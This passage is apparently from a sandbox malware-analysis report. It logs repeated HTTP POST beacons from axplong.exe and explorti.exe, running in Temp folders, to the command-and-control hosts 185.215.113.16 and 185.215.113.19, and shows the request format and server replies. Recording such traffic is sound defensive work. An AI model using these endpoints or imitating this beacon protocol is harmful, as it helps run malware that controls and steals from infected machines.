Jul 26, 2024 20:10:48.935740948 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:49.181452036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	64147	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:48.173062086 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:48.974692106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:48.976233959 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:49.230988979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	64152	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:49.295953989 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:50.056454897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:50.058765888 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:50.313807964 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	64153	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:49.342876911 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:50.123250008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:50.123986006 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:50.374891996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	64158	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:50.430255890 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:51.164958954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:51.165676117 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:51.411562920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	64160	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:50.492893934 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:51.236699104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:51.239140987 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:51.485255957 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	64163	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:51.518619061 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:52.291651964 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:52.323693037 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:52.574228048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	64164	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:51.595351934 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:52.368346930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:52.372499943 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:52.620594978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	64165	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:52.691282034 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:53.450350046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:53.454905987 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:53.702204943 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	64166	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:52.730958939 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:53.494646072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:53.521190882 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:53.772164106 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	64171	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:53.816262007 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:54.603818893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:54.626261950 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:54.878350019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	64172	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:53.888155937 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:54.661170006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:54.661834955 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:54.915000916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	64174	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:55.000273943 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:55.858664989 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:55.859447956 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:56.138089895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	64175	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

